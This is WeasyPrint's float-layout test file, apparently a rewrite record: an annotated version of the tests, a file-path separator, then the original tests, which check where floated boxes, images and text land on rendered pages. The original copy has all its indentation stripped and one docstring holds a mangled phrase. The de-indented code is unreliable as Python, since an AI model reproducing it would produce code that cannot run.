        <img src=pattern.png style="width: 50px" />
    ''')
    # Page 1: the 30px float takes the left edge, the in-flow image is
    # shifted to its right.
    html, = page_1.children
    body, = html.children
    float_img, anon_block = body.children
    line, = anon_block.children
    img_1, = line.children
    assert outer_area(float_img) == (0, 0, 30, 30)
    assert outer_area(img_1) == (30, 0, 50, 50)
    # Page 2: the float from page 1 must not carry over; the image starts
    # back at the left edge.  (The original test extracted img_2 but never
    # asserted on it, leaving the page-2 half of the claim unverified.)
    html, = page_2.children
    body, = html.children
    div, anon_block = body.children
    line, = anon_block.children
    img_2, = line.children
    assert outer_area(img_2) == (0, 0, 50, 50)
@assert_no_logs
def test_floats_9():
    """Regression test for https://github.com/Kozea/WeasyPrint/issues/263.

    Rendering a floated element with a percentage ``top`` must not crash;
    only successful rendering is checked.
    """
    markup = '<div style="top:100%; float:left">'
    page, = render_pages(markup)
@assert_no_logs
def test_floats_page_breaks_1():
    """Floated images shorter than the page break onto separate pages."""
    pages = render_pages('''
      <style>
        @page { size: 100px; margin: 10px }
        img { height: 45px; width:70px; float: left;}
      </style>
      <body>
        <img src=pattern.png>
        <!-- page break should be here !!! -->
        <img src=pattern.png>
    ''')
    assert len(pages) == 2
    # Collect the vertical position of every <img> on each page.  All
    # floats must hug the 10px left margin.  (The original also re-checked
    # ``element_tag == 'img'`` on a list already filtered by that exact
    # predicate, and used ``all([...])`` with throwaway lists.)
    positions_y = []
    for page in pages:
        images = [d for d in page.descendants() if d.element_tag == 'img']
        assert all(img.position_x == 10 for img in images)
        positions_y.append([img.position_y for img in images])
    # One image per page, each just below the top margin.
    assert positions_y == [[10], [10]]
@assert_no_logs
def test_floats_page_breaks_2():
    """Floated images taller than the page still break onto separate pages."""
    pages = render_pages('''
      <style>
        @page { size: 100px; margin: 10px }
        img { height: 81px; width:70px; float: left;}
      </style>
      <body>
        <img src=pattern.png>
        <!-- page break should be here !!! -->
        <img src=pattern.png>
    ''')
    assert len(pages) == 2
    # Collect the vertical position of every <img> on each page.  All
    # floats must hug the 10px left margin.  (Simplified from a version
    # that re-asserted the filter predicate and built throwaway lists.)
    positions_y = []
    for page in pages:
        images = [d for d in page.descendants() if d.element_tag == 'img']
        assert all(img.position_x == 10 for img in images)
        positions_y.append([img.position_y for img in images])
    # One image per page, each just below the top margin.
    assert positions_y == [[10], [10]]
@assert_no_logs
def test_floats_page_breaks_3():
    """Short floated images pack two per page before breaking."""
    pages = render_pages('''
      <style>
        @page { size: 100px; margin: 10px }
        img { height: 30px; width:70px; float: left;}
      </style>
      <body>
        <img src=pattern.png>
        <img src=pattern.png>
        <!-- page break should be here !!! -->
        <img src=pattern.png>
        <img src=pattern.png>
        <!-- page break should be here !!! -->
        <img src=pattern.png>
    ''')
    assert len(pages) == 3
    # Collect the vertical position of every <img> on each page.  All
    # floats must hug the 10px left margin.  (Simplified from a version
    # that re-asserted the filter predicate and built throwaway lists.)
    positions_y = []
    for page in pages:
        images = [d for d in page.descendants() if d.element_tag == 'img']
        assert all(img.position_x == 10 for img in images)
        positions_y.append([img.position_y for img in images])
    # Two 30px images stack per page (y = 10 and 40); the fifth image
    # goes alone on the last page.
    assert positions_y == [[10, 40], [10, 40], [10]]
@assert_no_logs
def test_floats_page_breaks_4():
    """The last tall div does not fit and is pushed to the next page."""
    pages = render_pages('''
      <style>
        @page{
          size: 110px;
          margin: 10px;
          padding: 0;
        }
        .large {
          width: 10px;
          height: 60px;
        }
        .small {
          width: 10px;
          height: 20px;
        }
      </style>
      <body>
        <div class="large"></div>
        <div class="small"></div>
        <div class="large"></div>
    ''')
    assert len(pages) == 2
    # Collect the vertical position of every <div> on each page.
    # (The original re-checked ``element_tag == 'div'`` on a list already
    # filtered by that predicate, and kept a pointless ``del``.)
    positions_y = []
    for page in pages:
        divs = [d for d in page.descendants() if d.element_tag == 'div']
        positions_y.append([div.position_y for div in divs])
    # large + small fit on page 1 (y = 10 and 70); the second large div
    # starts the next page.
    assert positions_y == [[10, 70], [10]]
@assert_no_logs
def test_floats_page_breaks_5():
    """``page-break-after: avoid`` drags the small div onto page 2.

    The last div does not fit on page 1; since the small div must not be
    followed by a break, it moves to page 2 together with it.
    """
    pages = render_pages('''
      <style>
        @page{
          size: 110px;
          margin: 10px;
          padding: 0;
        }
        .large {
          width: 10px;
          height: 60px;
        }
        .small {
          width: 10px;
          height: 20px;
          page-break-after: avoid;
        }
      </style>
      <body>
        <div class="large"></div>
        <div class="small"></div>
        <div class="large"></div>
    ''')
    assert len(pages) == 2
    # Collect the vertical position of every <div> on each page.
    # (Simplified from a version that re-asserted the filter predicate.)
    positions_y = []
    for page in pages:
        divs = [d for d in page.descendants() if d.element_tag == 'div']
        positions_y.append([div.position_y for div in divs])
    # Only the first large div stays on page 1; small + large land on
    # page 2 at y = 10 and 30.
    assert positions_y == [[10], [10, 30]]
@assert_no_logs
def test_floats_page_breaks_6():
    """``page-break-after: avoid`` cannot be honoured; each div gets a page.

    The small div should stay with the following large div, but that div
    is too tall to share a page, so the break happens anyway and the three
    divs end up on three pages.
    """
    pages = render_pages('''
      <style>
        @page{
          size: 110px;
          margin: 10px;
          padding: 0;
        }
        .large {
          width: 10px;
          height: 80px;
        }
        .small {
          width: 10px;
          height: 20px;
          page-break-after: avoid;
        }
      </style>
      <body>
        <div class="large"></div>
        <div class="small"></div>
        <div class="large"></div>
    ''')
    assert len(pages) == 3
    # Collect the vertical position of every <div> on each page.
    # (Simplified from a version that re-asserted the filter predicate.)
    positions_y = []
    for page in pages:
        divs = [d for d in page.descendants() if d.element_tag == 'div']
        positions_y.append([div.position_y for div in divs])
    # One div per page, each just below the top margin.
    assert positions_y == [[10], [10], [10]]
@assert_no_logs
def test_preferred_widths_1():
    """Min- and max-content widths of a floated ``pre-line`` paragraph.

    ``white-space: pre-line`` keeps the authored line breaks, and the
    no-break space between "consectetur" and "elit" keeps those two words
    on a single line even at the minimum width.  (The literal no-break
    space was lost in transcription — the ``<!-- ^ --&gt;`` marker points at
    it — so it is restored here as the `` `` entity; without it the
    min-content width would break between the words and the first
    assertion would fail.)
    """
    def get_float_width(body_width):
        page, = render_pages('''
          <style>
            @font-face { src: url(weasyprint.otf); font-family: weasyprint }
          </style>
          <body style="width: %spx; font-family: weasyprint">
          <p style="white-space: pre-line; float: left">
              Lorem ipsum dolor sit amet,
              consectetur&nbsp;elit
          </p>
          <!-- ^ No-break space here -->
        ''' % body_width)
        html, = page.children
        body, = html.children
        paragraph, = body.children
        return paragraph.width
    # Preferred minimum width: the longest unbreakable run,
    # 'consectetur\xa0elit' (16 characters, 16px each in the test font).
    assert get_float_width(10) == len('consectetur elit') * 16
    # Preferred (max-content) width: the longest authored line.
    assert get_float_width(1000000) == len('Lorem ipsum dolor sit amet,') * 16
@assert_no_logs
def test_preferred_widths_2():
    """Whitespace must not inflate a float's preferred width.

    Non-regression test: incorrect whitespace handling in the preferred
    width computation used to cause an unnecessary line break.
    """
    page, = render_pages('''
      <p style="float: left">Lorem <em>ipsum</em> dolor.</p>
    ''')
    html, = page.children
    body, = html.children
    paragraph, = body.children
    # Everything must fit on a single line box.
    lines = paragraph.children
    assert len(lines) == 1
    line, = lines
    assert isinstance(line, boxes.LineBox)
@assert_no_logs
def test_preferred_widths_3():
    """A float's shrink-to-fit width equals its widest <br>-separated line."""
    page, = render_pages('''
      <style>img { width: 20px }</style>
      <p style="float: left">
      <img src=pattern.png><img src=pattern.png><br>
      <img src=pattern.png></p>
    ''')
    document_root, = page.children
    document_body, = document_root.children
    float_box, = document_body.children
    # Widest line holds two 20px images.
    assert float_box.width == 2 * 20
@assert_no_logs
def test_preferred_widths_4():
    """Shrink-to-fit width with explicit <br> breaks and 20px glyphs."""
    markup = (
        '<style>'
        ' @font-face { src: url(weasyprint.otf); font-family: weasyprint }'
        ' p { font: 20px weasyprint }'
        '</style>'
        '<p style="float: left">XX<br>XX<br>X</p>')
    page, = render_pages(markup)
    document_root, = page.children
    document_body, = document_root.children
    float_box, = document_body.children
    # Widest line is "XX": two 20px glyphs.
    assert float_box.width == 2 * 20
@assert_no_logs
def test_preferred_widths_5():
    """A space at the start of a line collapses and adds no width."""
    markup = (
        '<style>'
        ' @font-face { src: url(weasyprint.otf); font-family: weasyprint }'
        ' p { font: 20px weasyprint }'
        '</style>'
        '<p style="float: left">XX<br> XX<br>X</p>')
    page, = render_pages(markup)
    document_root, = page.children
    document_body, = document_root.children
    float_box, = document_body.children
    # " XX" measures the same as "XX" once the leading space collapses.
    assert float_box.width == 2 * 20
@assert_no_logs
def test_float_in_inline_1():
    # A right float declared inside an inline <a>: the float "cc" is taken
    # out of flow to the right edge, the remaining text flows around it.
    # Font is the 20px test font, so every character is 20px wide.
    page, = render_pages('''
      <style>
        @font-face { src: url(weasyprint.otf); font-family: weasyprint }
        body {
          font-family: weasyprint;
          font-size: 20px;
        }
        p {
          width: 14em;
          text-align: justify;
        }
        span {
          float: right;
        }
      </style>
      <p>
        aa bb <a><span>cc</span> ddd</a> ee ff
      </p>
    ''')
    html, = page.children
    body, = html.children
    paragraph, = body.children
    line1, line2 = paragraph.children
    p1, a, p2 = line1.children
    # 'aa bb ' before the link: 6 characters from x=0.
    assert p1.width == 6 * 20
    assert p1.text == 'aa bb '
    assert p1.position_x == 0 * 20
    # ' ee' after the link, before the 2-char float at the right edge.
    assert p2.width == 3 * 20
    assert p2.text == ' ee'
    assert p2.position_x == 9 * 20
    span, a_text = a.children
    assert a_text.width == 3 * 20  # leading space collapse
    assert a_text.text == 'ddd'
    assert a_text.position_x == 6 * 20
    # The float 'cc' sits at the right edge of the 14em paragraph.
    assert span.width == 2 * 20
    assert span.children[0].children[0].text == 'cc'
    assert span.position_x == 12 * 20
    # 'ff' wraps to the second line.
    p3, = line2.children
    assert p3.width == 2 * 20
@assert_no_logs
def test_float_in_inline_2():
    # A block float at the very start of an inline span: the float takes
    # the left half of the first line, text flows beside it then wraps.
    page, = render_pages('''
      <style>
        @font-face { src: url(weasyprint.otf); font-family: weasyprint }
        @page {
          size: 10em;
        }
        article {
          font-family: weasyprint;
          line-height: 1;
        }
        div {
          float: left;
          width: 50%;
        }
      </style>
      <article>
        <span>
          <div>a b c</div>
          1 2 3 4 5 6
        </span>
      </article>''')
    html, = page.children
    body, = html.children
    article, = body.children
    line1, line2 = article.children
    # First line: the float, then as much text as fits beside it.
    span1, = line1.children
    div, text = span1.children
    assert div.children[0].children[0].text.strip() == 'a b c'
    assert text.text.strip() == '1 2 3'
    # Second line: the remaining text.
    span2, = line2.children
    text, = span2.children
    assert text.text.strip() == '4 5 6'
@assert_no_logs
def test_float_in_inline_3():
    # Same as test_float_in_inline_2 but the float appears after some
    # text; it still lands on the first line since that text fits before
    # it on the same line.
    page, = render_pages('''
      <style>
        @font-face { src: url(weasyprint.otf); font-family: weasyprint }
        @page {
          size: 10em;
        }
        article {
          font-family: weasyprint;
          line-height: 1;
        }
        div {
          float: left;
          width: 50%;
        }
      </style>
      <article>
        <span>
          1 2 3 <div>a b c</div> 4 5 6
        </span>
      </article>''')
    html, = page.children
    body, = html.children
    article, = body.children
    line1, line2 = article.children
    # First line: leading text, then the float.
    span1, = line1.children
    text, div = span1.children
    assert text.text.strip() == '1 2 3'
    assert div.children[0].children[0].text.strip() == 'a b c'
    # Second line: the trailing text.
    span2, = line2.children
    text, = span2.children
    assert text.text.strip() == '4 5 6'
@assert_no_logs
def test_float_in_inline_4():
    # The float is declared mid-line but there is no room left on the
    # first line, so it is deferred below it (position_y == 16, one
    # 16px line-height down) while the text keeps flowing.
    page, = render_pages('''
      <style>
        @font-face { src: url(weasyprint.otf); font-family: weasyprint }
        @page {
          size: 10em;
        }
        article {
          font-family: weasyprint;
          line-height: 1;
        }
        div {
          float: left;
          width: 50%;
        }
      </style>
      <article>
        <span>
          1 2 3 4 <div>a b c</div> 5 6
        </span>
      </article>''')
    html, = page.children
    body, = html.children
    article, = body.children
    line1, line2 = article.children
    # First line: the text before and right after the float declaration;
    # the float box itself is a sibling on the line.
    span1, div = line1.children
    text1, text2 = span1.children
    assert text1.text.strip() == '1 2 3 4'
    assert text2.text.strip() == '5'
    # The float is pushed below the first line.
    assert div.position_y == 16
    assert div.children[0].children[0].text.strip() == 'a b c'
    # Second line: the remaining text beside the float.
    span2, = line2.children
    text, = span2.children
    assert text.text.strip() == '6'
@assert_no_logs
def test_float_next_line():
    # A float that does not fit on the current line is placed at the start
    # of the next line; the inline content that follows it flows to its
    # right.  Every character is 20px wide (test font).
    page, = render_pages('''
      <style>
        @font-face { src: url(weasyprint.otf); font-family: weasyprint }
        body {
          font-family: weasyprint;
          font-size: 20px;
        }
        p {
          text-align: justify;
          width: 13em;
        }
        span {
          float: left;
        }
      </style>
      <p>pp pp pp pp <a><span>ppppp</span> aa</a> pp pp pp pp pp</p>''')
    html, = page.children
    body, = html.children
    paragraph, = body.children
    line1, line2, line3 = paragraph.children
    assert len(line1.children) == 1
    assert len(line3.children) == 1
    a, p = line2.children
    span, a_text = a.children
    # The 5-char float starts line 2 at the left edge.
    assert span.position_x == 0
    assert span.width == 5 * 20
    # The link text follows immediately after the float.
    assert a_text.position_x == a.position_x == 5 * 20
    assert a_text.width == a.width == 2 * 20
    assert p.position_x == 7 * 20
@assert_no_logs
def test_float_text_indent_1():
    # text-indent interacts with a left float on the first line: the
    # indent is absorbed into the float's placement, and the in-flow text
    # is indented again after it.  Every character is 20px wide.
    page, = render_pages('''
      <style>
        @font-face { src: url(weasyprint.otf); font-family: weasyprint }
        body {
          font-family: weasyprint;
          font-size: 20px;
        }
        p {
          text-align: justify;
          text-indent: 1em;
          width: 14em;
        }
        span {
          float: left;
        }
      </style>
      <p><a>aa <span>float</span> aa</a></p>''')
    html, = page.children
    body, = html.children
    paragraph, = body.children
    line1, = paragraph.children
    a, = line1.children
    a1, span, a2 = a.children
    span_text, = span.children
    assert span.position_x == span_text.position_x == 0
    assert span.width == span_text.width == (
        (1 + 5) * 20)  # text-indent + span text
    assert a1.width == 3 * 20
    assert a1.position_x == (1 + 5 + 1) * 20  # span + a1 text-indent
    assert a2.width == 2 * 20  # leading space collapse
    assert a2.position_x == (1 + 5 + 1 + 3) * 20  # span + a1 t-i + a1
@assert_no_logs
def test_float_text_indent_2():
    # Same as test_float_text_indent_1, but the float is on the second
    # line: only the first line of the paragraph gets the text-indent,
    # so the in-flow text on line 2 is not re-indented after the float.
    page, = render_pages('''
      <style>
        @font-face { src: url(weasyprint.otf); font-family: weasyprint }
        body {
          font-family: weasyprint;
          font-size: 20px;
        }
        p {
          text-align: justify;
          text-indent: 1em;
          width: 14em;
        }
        span {
          float: left;
        }
      </style>
      <p>
        oooooooooooo
        <a>aa <span>float</span> aa</a></p>''')
    html, = page.children
    body, = html.children
    paragraph, = body.children
    line1, line2 = paragraph.children
    p1, = line1.children
    assert p1.position_x == 1 * 20  # text-indent
    assert p1.width == 12 * 20  # p text
    a, = line2.children
    a1, span, a2 = a.children
    span_text, = span.children
    assert span.position_x == span_text.position_x == 0
    assert span.width == span_text.width == (
        (1 + 5) * 20)  # text-indent + span text
    assert a1.width == 3 * 20
    assert a1.position_x == (1 + 5) * 20  # span
    assert a2.width == 2 * 20  # leading space collapse
    assert a2.position_x == (1 + 5 + 3) * 20  # span + a1
@assert_no_logs
def test_float_text_indent_3():
    # Right-float variant: the float goes to the right edge of the 14em
    # paragraph, the in-flow link text stays on the left, and the third
    # line (past the first) gets no text-indent.
    page, = render_pages('''
      <style>
        @font-face { src: url(weasyprint.otf); font-family: weasyprint }
        body {
          font-family: weasyprint;
          font-size: 20px;
        }
        p {
          text-align: justify;
          text-indent: 1em;
          width: 14em;
        }
        span {
          float: right;
        }
      </style>
      <p>
        oooooooooooo
        <a>aa <span>float</span> aa</a>
        oooooooooooo
      </p>''')
    html, = page.children
    body, = html.children
    paragraph, = body.children
    line1, line2, line3 = paragraph.children
    p1, = line1.children
    assert p1.position_x == 1 * 20  # text-indent
    assert p1.width == 12 * 20  # p text
    a, = line2.children
    a1, span, a2 = a.children
    span_text, = span.children
    # The 5-char float plus the 1em indent hang from the right edge.
    assert span.position_x == span_text.position_x == (14 - 5 - 1) * 20
    assert span.width == span_text.width == (
        (1 + 5) * 20)  # text-indent + span text
    assert a1.position_x == 0  # span
    assert a2.width == 2 * 20  # leading space collapse
    assert a2.position_x == (14 - 5 - 1 - 2) * 20
    # Third line: no indent past the first line.
    p2, = line3.children
    assert p2.position_x == 0
    assert p2.width == 12 * 20  # p text
@pytest.mark.xfail
@assert_no_logs
def test_float_fail():
page, = render_pages('''
<style>
@font-face { src: url(weasyprint.otf); font-family: weasyprint }
body {
font-family: weasyprint;
font-size: 20px;
}
p {
text-align: justify;
width: 12em;
}
span {
float: left;
background: red;
}
a {
background: yellow;
}
</style>
<p>bb bb pp bb pp pb <a><span>pp pp</span> apa</a> bb bb</p>''')
html, = page.children
body, = html.children
paragraph, = body.children
line1, line2, line3 = paragraph.children | tests/test_float.py | import pytest
from weasyprint.formatting_structure import boxes
from .testing_utils import assert_no_logs, render_pages
def outer_area(box):
"""Return the (x, y, w, h) rectangle for the outer area of a box."""
return (box.position_x, box.position_y,
box.margin_width(), box.margin_height())
@assert_no_logs
def test_floats_1():
# adjacent-floats-001
page, = render_pages('''
<style>
div { float: left }
img { width: 100px; vertical-align: top }
</style>
<div><img src=pattern.png /></div>
<div><img src=pattern.png /></div>''')
html, = page.children
body, = html.children
div_1, div_2 = body.children
assert outer_area(div_1) == (0, 0, 100, 100)
assert outer_area(div_2) == (100, 0, 100, 100)
@assert_no_logs
def test_floats_2():
# c414-flt-fit-000
page, = render_pages('''
<style>
body { width: 290px }
div { float: left; width: 100px; }
img { width: 60px; vertical-align: top }
</style>
<div><img src=pattern.png /><!-- 1 --></div>
<div><img src=pattern.png /><!-- 2 --></div>
<div><img src=pattern.png /><!-- 4 --></div>
<img src=pattern.png /><!-- 3
--><img src=pattern.png /><!-- 5 -->''')
html, = page.children
body, = html.children
div_1, div_2, div_4, anon_block = body.children
line_3, line_5 = anon_block.children
img_3, = line_3.children
img_5, = line_5.children
assert outer_area(div_1) == (0, 0, 100, 60)
assert outer_area(div_2) == (100, 0, 100, 60)
assert outer_area(img_3) == (200, 0, 60, 60)
assert outer_area(div_4) == (0, 60, 100, 60)
assert outer_area(img_5) == (100, 60, 60, 60)
@assert_no_logs
def test_floats_3():
# c414-flt-fit-002
page, = render_pages('''
<style type="text/css">
body { width: 200px }
p { width: 70px; height: 20px }
.left { float: left }
.right { float: right }
</style>
<p class="left"> ⇦ A 1 </p>
<p class="left"> ⇦ B 2 </p>
<p class="left"> ⇦ A 3 </p>
<p class="right"> B 4 ⇨ </p>
<p class="left"> ⇦ A 5 </p>
<p class="right"> B 6 ⇨ </p>
<p class="right"> B 8 ⇨ </p>
<p class="left"> ⇦ A 7 </p>
<p class="left"> ⇦ A 9 </p>
<p class="left"> ⇦ B 10 </p>
''')
html, = page.children
body, = html.children
positions = [(paragraph.position_x, paragraph.position_y)
for paragraph in body.children]
assert positions == [
(0, 0), (70, 0), (0, 20), (130, 20), (0, 40), (130, 40),
(130, 60), (0, 60), (0, 80), (70, 80), ]
@assert_no_logs
def test_floats_4():
# c414-flt-wrap-000 ... more or less
page, = render_pages('''
<style>
body { width: 100px }
p { float: left; height: 100px }
img { width: 60px; vertical-align: top }
</style>
<p style="width: 20px"></p>
<p style="width: 100%"></p>
<img src=pattern.png /><img src=pattern.png />
''')
html, = page.children
body, = html.children
p_1, p_2, anon_block = body.children
line_1, line_2 = anon_block.children
assert anon_block.position_y == 0
assert (line_1.position_x, line_1.position_y) == (20, 0)
assert (line_2.position_x, line_2.position_y) == (0, 200)
@assert_no_logs
def test_floats_5():
# c414-flt-wrap-000 with text ... more or less
page, = render_pages('''
<style>
@font-face { src: url(weasyprint.otf); font-family: weasyprint }
body { width: 100px; font: 60px weasyprint; }
p { float: left; height: 100px }
img { width: 60px; vertical-align: top }
</style>
<p style="width: 20px"></p>
<p style="width: 100%"></p>
A B
''')
html, = page.children
body, = html.children
p_1, p_2, anon_block = body.children
line_1, line_2 = anon_block.children
assert anon_block.position_y == 0
assert (line_1.position_x, line_1.position_y) == (20, 0)
assert (line_2.position_x, line_2.position_y) == (0, 200)
@assert_no_logs
def test_floats_6():
# floats-placement-vertical-001b
page, = render_pages('''
<style>
body { width: 90px; font-size: 0 }
img { vertical-align: top }
</style>
<body>
<span>
<img src=pattern.png style="width: 50px" />
<img src=pattern.png style="width: 50px" />
<img src=pattern.png style="float: left; width: 30px" />
</span>
''')
html, = page.children
body, = html.children
line_1, line_2 = body.children
span_1, = line_1.children
span_2, = line_2.children
img_1, = span_1.children
img_2, img_3 = span_2.children
assert outer_area(img_1) == (0, 0, 50, 50)
assert outer_area(img_2) == (30, 50, 50, 50)
assert outer_area(img_3) == (0, 50, 30, 30)
@assert_no_logs
def test_floats_7():
# Variant of the above: no <span>
page, = render_pages('''
<style>
body { width: 90px; font-size: 0 }
img { vertical-align: top }
</style>
<body>
<img src=pattern.png style="width: 50px" />
<img src=pattern.png style="width: 50px" />
<img src=pattern.png style="float: left; width: 30px" />
''')
html, = page.children
body, = html.children
line_1, line_2 = body.children
img_1, = line_1.children
img_2, img_3 = line_2.children
assert outer_area(img_1) == (0, 0, 50, 50)
assert outer_area(img_2) == (30, 50, 50, 50)
assert outer_area(img_3) == (0, 50, 30, 30)
@assert_no_logs
def test_floats_8():
# Floats do no affect other pages
page_1, page_2 = render_pages('''
<style>
body { width: 90px; font-size: 0 }
img { vertical-align: top }
</style>
<body>
<img src=pattern.png style="float: left; width: 30px" />
<img src=pattern.png style="width: 50px" />
<div style="page-break-before: always"></div>
<img src=pattern.png style="width: 50px" />
''')
html, = page_1.children
body, = html.children
float_img, anon_block, = body.children
line, = anon_block.children
img_1, = line.children
assert outer_area(float_img) == (0, 0, 30, 30)
assert outer_area(img_1) == (30, 0, 50, 50)
html, = page_2.children
body, = html.children
div, anon_block = body.children
line, = anon_block.children
img_2, = line.children
@assert_no_logs
def test_floats_9():
# Regression test
# https://github.com/Kozea/WeasyPrint/issues/263
page, = render_pages('''<div style="top:100%; float:left">''')
@assert_no_logs
def test_floats_page_breaks_1():
# Tests floated images shorter than the page
pages = render_pages('''
<style>
@page { size: 100px; margin: 10px }
img { height: 45px; width:70px; float: left;}
</style>
<body>
<img src=pattern.png>
<!-- page break should be here !!! -->
<img src=pattern.png>
''')
assert len(pages) == 2
page_images = []
for page in pages:
images = [d for d in page.descendants() if d.element_tag == 'img']
assert all([img.element_tag == 'img' for img in images])
assert all([img.position_x == 10 for img in images])
page_images.append(images)
del images
positions_y = [[img.position_y for img in images]
for images in page_images]
assert positions_y == [[10], [10]]
@assert_no_logs
def test_floats_page_breaks_2():
# Tests floated images taller than the page
pages = render_pages('''
<style>
@page { size: 100px; margin: 10px }
img { height: 81px; width:70px; float: left;}
</style>
<body>
<img src=pattern.png>
<!-- page break should be here !!! -->
<img src=pattern.png>
''')
assert len(pages) == 2
page_images = []
for page in pages:
images = [d for d in page.descendants() if d.element_tag == 'img']
assert all([img.element_tag == 'img' for img in images])
assert all([img.position_x == 10 for img in images])
page_images.append(images)
del images
positions_y = [[img.position_y for img in images]
for images in page_images]
assert positions_y == [[10], [10]]
@assert_no_logs
def test_floats_page_breaks_3():
# Tests floated images shorter than the page
pages = render_pages('''
<style>
@page { size: 100px; margin: 10px }
img { height: 30px; width:70px; float: left;}
</style>
<body>
<img src=pattern.png>
<img src=pattern.png>
<!-- page break should be here !!! -->
<img src=pattern.png>
<img src=pattern.png>
<!-- page break should be here !!! -->
<img src=pattern.png>
''')
assert len(pages) == 3
page_images = []
for page in pages:
images = [d for d in page.descendants() if d.element_tag == 'img']
assert all([img.element_tag == 'img' for img in images])
assert all([img.position_x == 10 for img in images])
page_images.append(images)
del images
positions_y = [[img.position_y for img in images]
for images in page_images]
assert positions_y == [[10, 40], [10, 40], [10]]
@assert_no_logs
def test_floats_page_breaks_4():
# last float does not fit, pushed to next page
pages = render_pages('''
<style>
@page{
size: 110px;
margin: 10px;
padding: 0;
}
.large {
width: 10px;
height: 60px;
}
.small {
width: 10px;
height: 20px;
}
</style>
<body>
<div class="large"></div>
<div class="small"></div>
<div class="large"></div>
''')
assert len(pages) == 2
page_divs = []
for page in pages:
divs = [div for div in page.descendants() if div.element_tag == 'div']
assert all([div.element_tag == 'div' for div in divs])
page_divs.append(divs)
del divs
positions_y = [[div.position_y for div in divs] for divs in page_divs]
assert positions_y == [[10, 70], [10]]
@assert_no_logs
def test_floats_page_breaks_5():
# last float does not fit, pushed to next page
# center div must not
pages = render_pages('''
<style>
@page{
size: 110px;
margin: 10px;
padding: 0;
}
.large {
width: 10px;
height: 60px;
}
.small {
width: 10px;
height: 20px;
page-break-after: avoid;
}
</style>
<body>
<div class="large"></div>
<div class="small"></div>
<div class="large"></div>
''')
assert len(pages) == 2
page_divs = []
for page in pages:
divs = [div for div in page.descendants() if div.element_tag == 'div']
assert all([div.element_tag == 'div' for div in divs])
page_divs.append(divs)
del divs
positions_y = [[div.position_y for div in divs] for divs in page_divs]
assert positions_y == [[10], [10, 30]]
@assert_no_logs
def test_floats_page_breaks_6():
# center div must be the last element,
# but float won't fit and will get pushed anyway
pages = render_pages('''
<style>
@page{
size: 110px;
margin: 10px;
padding: 0;
}
.large {
width: 10px;
height: 80px;
}
.small {
width: 10px;
height: 20px;
page-break-after: avoid;
}
</style>
<body>
<div class="large"></div>
<div class="small"></div>
<div class="large"></div>
''')
assert len(pages) == 3
page_divs = []
for page in pages:
divs = [div for div in page.descendants() if div.element_tag == 'div']
assert all([div.element_tag == 'div' for div in divs])
page_divs.append(divs)
del divs
positions_y = [[div.position_y for div in divs] for divs in page_divs]
assert positions_y == [[10], [10], [10]]
@assert_no_logs
def test_preferred_widths_1():
def get_float_width(body_width):
page, = render_pages('''
<style>
@font-face { src: url(weasyprint.otf); font-family: weasyprint }
</style>
<body style="width: %spx; font-family: weasyprint">
<p style="white-space: pre-line; float: left">
Lorem ipsum dolor sit amet,
consectetur elit
</p>
<!-- ^ No-break space here -->
''' % body_width)
html, = page.children
body, = html.children
paragraph, = body.children
return paragraph.width
# Preferred minimum width:
assert get_float_width(10) == len('consectetur elit') * 16
# Preferred width:
assert get_float_width(1000000) == len('Lorem ipsum dolor sit amet,') * 16
@assert_no_logs
def test_preferred_widths_2():
# Non-regression test:
# Incorrect whitespace handling in preferred width used to cause
# unnecessary line break.
page, = render_pages('''
<p style="float: left">Lorem <em>ipsum</em> dolor.</p>
''')
html, = page.children
body, = html.children
paragraph, = body.children
assert len(paragraph.children) == 1
assert isinstance(paragraph.children[0], boxes.LineBox)
@assert_no_logs
def test_preferred_widths_3():
page, = render_pages('''
<style>img { width: 20px }</style>
<p style="float: left">
<img src=pattern.png><img src=pattern.png><br>
<img src=pattern.png></p>
''')
html, = page.children
body, = html.children
paragraph, = body.children
assert paragraph.width == 40
@assert_no_logs
def test_preferred_widths_4():
page, = render_pages(
'<style>'
' @font-face { src: url(weasyprint.otf); font-family: weasyprint }'
' p { font: 20px weasyprint }'
'</style>'
'<p style="float: left">XX<br>XX<br>X</p>')
html, = page.children
body, = html.children
paragraph, = body.children
assert paragraph.width == 40
@assert_no_logs
def test_preferred_widths_5():
# The space is the start of the line is collapsed.
page, = render_pages(
'<style>'
' @font-face { src: url(weasyprint.otf); font-family: weasyprint }'
' p { font: 20px weasyprint }'
'</style>'
'<p style="float: left">XX<br> XX<br>X</p>')
html, = page.children
body, = html.children
paragraph, = body.children
assert paragraph.width == 40
@assert_no_logs
def test_float_in_inline_1():
page, = render_pages('''
<style>
@font-face { src: url(weasyprint.otf); font-family: weasyprint }
body {
font-family: weasyprint;
font-size: 20px;
}
p {
width: 14em;
text-align: justify;
}
span {
float: right;
}
</style>
<p>
aa bb <a><span>cc</span> ddd</a> ee ff
</p>
''')
html, = page.children
body, = html.children
paragraph, = body.children
line1, line2 = paragraph.children
p1, a, p2 = line1.children
assert p1.width == 6 * 20
assert p1.text == 'aa bb '
assert p1.position_x == 0 * 20
assert p2.width == 3 * 20
assert p2.text == ' ee'
assert p2.position_x == 9 * 20
span, a_text = a.children
assert a_text.width == 3 * 20 # leading space collapse
assert a_text.text == 'ddd'
assert a_text.position_x == 6 * 20
assert span.width == 2 * 20
assert span.children[0].children[0].text == 'cc'
assert span.position_x == 12 * 20
p3, = line2.children
assert p3.width == 2 * 20
@assert_no_logs
def test_float_in_inline_2():
page, = render_pages('''
<style>
@font-face { src: url(weasyprint.otf); font-family: weasyprint }
@page {
size: 10em;
}
article {
font-family: weasyprint;
line-height: 1;
}
div {
float: left;
width: 50%;
}
</style>
<article>
<span>
<div>a b c</div>
1 2 3 4 5 6
</span>
</article>''')
html, = page.children
body, = html.children
article, = body.children
line1, line2 = article.children
span1, = line1.children
div, text = span1.children
assert div.children[0].children[0].text.strip() == 'a b c'
assert text.text.strip() == '1 2 3'
span2, = line2.children
text, = span2.children
assert text.text.strip() == '4 5 6'
@assert_no_logs
def test_float_in_inline_3():
page, = render_pages('''
<style>
@font-face { src: url(weasyprint.otf); font-family: weasyprint }
@page {
size: 10em;
}
article {
font-family: weasyprint;
line-height: 1;
}
div {
float: left;
width: 50%;
}
</style>
<article>
<span>
1 2 3 <div>a b c</div> 4 5 6
</span>
</article>''')
html, = page.children
body, = html.children
article, = body.children
line1, line2 = article.children
span1, = line1.children
text, div = span1.children
assert text.text.strip() == '1 2 3'
assert div.children[0].children[0].text.strip() == 'a b c'
span2, = line2.children
text, = span2.children
assert text.text.strip() == '4 5 6'
@assert_no_logs
def test_float_in_inline_4():
page, = render_pages('''
<style>
@font-face { src: url(weasyprint.otf); font-family: weasyprint }
@page {
size: 10em;
}
article {
